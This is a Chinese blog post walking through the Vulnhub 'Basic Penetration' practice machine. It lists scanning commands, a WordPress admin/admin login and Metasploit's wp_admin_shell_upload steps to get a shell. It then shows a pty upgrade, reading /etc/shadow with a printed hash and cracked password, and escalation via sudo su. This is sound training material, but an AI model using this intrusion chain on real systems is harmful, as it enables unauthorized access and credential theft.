Basic penetration靶机

于 2024-09-27 17:33:27 发布
阅读量112 收藏 1
点赞数 6
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80154010/article/details/142598943
版权

主机发现

arp-scan -l

端口扫描

nmap -sV -sT -O 192.168.224.138 -p-

目录扫描

dirsearch -u http://192.168.224.138

浏览器访问

往下翻到一个login界面,尝试弱口令 admin admin 登录一下

getshell

利用msf的模块来getshell,启动msf,成功 getshell

msfconsole   #开启msf环境
 
search wp_admin 				#搜索wordpress的admin账户的上传利用脚本
use exploit/unix/webapp/wp_admin_shell_upload			#进入利用脚本
show option
set rhosts 192.168.224.138
set targeturi /secret/	#设置目标的url目录地址
set username admin   #设置登录的用户账号
set password admin   #设置登陆的用户密码
run   # 运行

提权

先转变为交互式的shell

shell
 
python -c 'import pty; pty.spawn("/bin/bash")'

利用sudo 提权发现需要密码,但是发现 /etc/shadow 是可以读的

cat /etc/shadow

发现一个 用户 和加密后的密码

marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4
#解密过后
marlinspike:marlinspike

此时可以切换到这个用户,再sudu su 到root用户

su marlinspike
marlinspike
sudo su
marlinspike
whoami

提权成功!

Gigity123
关注
Basic-penetration靶机
zdd1453691081的博客
08-04 151
(1)ip扫描
【vulnhub】Basic Penetration靶机
wbplife的博客
08-04 275
因为我们知道管理员账户与密码,所以利用msf的模块来getshell,启动msf,成功 getshell。在文件/etc/shadow里面进行查看密码,发现marlinspike用户的密码,进行解密。网址后面拼接目录扫到的/secret,发现是 wordpress 搭建的。访问 /wp-admin 页面,是一个登录页面。进行sudo提权尝试,发现需要输入密码,不能用。尝试弱口令,admin:admin 成功登录。发现/etc/shadow文件是可读的。端口扫描,开启了22,80,21端口。
Basic-penetration靶机渗透测试
weixin_58786230的博客
08-04 232
【代码】Basic-penetration靶机渗透测试。
basic_pentesting_1靶机的信息收集技术和漏洞扫描技术学习运用
zyzy0512的博客
07-01 1590
打开kali输入ifconfig回车,如图1.1所示。
Vulnhub靶机basic_pentesting_1
qq_48904485的博客
02-29 466
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机basic_pentesting_1(10.0.2.6)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/
vulnhub/Basic Penetration
qq_45230030的博客
04-29 184
日常打靶其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。攻击机(kali)IP:192.168.59.143。
Vulnhub靶机 Basic penetration(渗透测试详解)
2301_78721909的博客
08-03 113
使用searchsploit工具搜索该版本的历史漏洞,发现存在命令执行漏洞。根据nmap的扫描结果发现ftp的版本为。2、对靶机IP进行主机发现和端口扫描。发现开放了21、22、80端口。成功获取root权限。
漏洞复现 -- Basic penetration
2301_80854251的博客
06-28 221
漏洞复现 -- Basic penetration
[Vulnhub] basic_pentesting 2
weixin_63231007的博客
07-12 765
目录信息搜集 S2-052漏洞利用 Hydra爆破jan密码(1) vim读取密码 (2) ssh公钥私钥获取身份登录凭据下载链接:Basic Pentesting: 2 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ipnetdiscover -i eth0 -r 192.168.1.0/24靶机ip : 192.168.236.138nmap -A 192.168.236.138 扫描一下靶机的具体信息。 收集靶场环境的服务和端口信息我们可以看见139和4...
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 623
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
HTB HARD 靶机 Cerberus WriteUp
qq_58869808的博客
03-26 8213
HTB Cerberus hard!!!靶机writeUp
vulnhub靶机-DC7-Writeup
liuhanzhe的专栏
12-09 1578
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-7,356/ DESCRIPTION DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn’t an overly technical challenge, it isn’t exactly e
vulnhub靶机-DC8-Writeup
liuhanzhe的专栏
12-09 2001
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-8,367/ DESCRIPTION DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challe
DC-1靶机教程
qq_42553928的博客
04-07 5275
1.明确目标 DC:1 下载地址 https ://download.vulnhub.com/dc/DC-1.zip 2.信息收集 2.1被动信息收集 2.1.1DC:1网页信息收集 https://www.vulnhub.com/entry/dc-1,292/ Description Back to the Top DESCRIPTION DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8472
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
excore-0.1.1b0-py3-none-any.whl
最新发布
09-27
excore-0.1.1b0-py3-none-any.whl
基于C语言实现的疫情防疫智能小车消毒机器人设计源码
09-27
该项目为基于C语言开发的疫情防疫智能小车消毒机器人开源源码,总文件量为166个,涵盖35个头文件(.h)、35个源文件(.c)、34个数据文件(.d)、10个Makefile文件(.mk)、2个映射文件(.map)、2个C/C++项目文件(.cproject、.project)、1个启动配置文件(.launch)和1个项目文件(.project)。此设计旨在提高室内消毒效率,适用于走廊等外部干扰较少的环境。通过智能小车的应用,实现了安全高效的消毒作业,减少了人力消耗和消毒盲区。机器人可通过红外循迹技术进行自动导航,并配备一键启动功能,进一步解放劳动力,确保消毒工作的稳定性和可靠性。
《open3d+pyqt》open3d窗口显示到qt中
09-27
《open3d+pyqt》open3d窗口显示到qt中
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值